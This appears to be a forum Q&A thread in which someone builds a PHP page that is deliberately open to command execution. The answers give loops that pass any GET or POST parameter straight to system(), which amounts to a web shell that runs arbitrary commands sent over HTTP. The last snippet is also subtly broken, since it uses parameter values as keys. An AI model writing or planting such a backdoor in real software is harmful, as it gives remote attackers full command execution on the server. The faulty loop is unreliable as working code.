I'm trying to make a simple page command execution vulnerability... This is my code:
system($_GET['cmd']);
It is working fine, like this : http://example/index.php?cmd=ls
The problem is I want make this little code to work with any parameter and any method (GET or POST)
For example, if any parameter is used then it will still pass through the system method, ie: "?hello=ls". (I did not know they where to use hello as the key. Any ideas?
You could store each index key in an array then loop the set value.
$keys = ['cmd', 'hello', 'etc..']; // jus add your params
// GET params
foreach($keys as $_key) {
if(isset($_GET[$_key]) && !empty($_GET[$_key])) {
system($_GET[$_key]);
}
}
// POST params
foreach($keys as $_key) {
if(isset($_POST[$_key]) && !empty($_POST[$_key])) {
system($_POST[$_key]);
}
}
If you do not want to know the key to the POST/GET then:
foreach($_GET as $key) {
system($_GET[$key]);
}
foreach($_POST as $key) {
system($_POST[$key]);
}
You can try to use: file_get_contents('php://input'); to get RAW input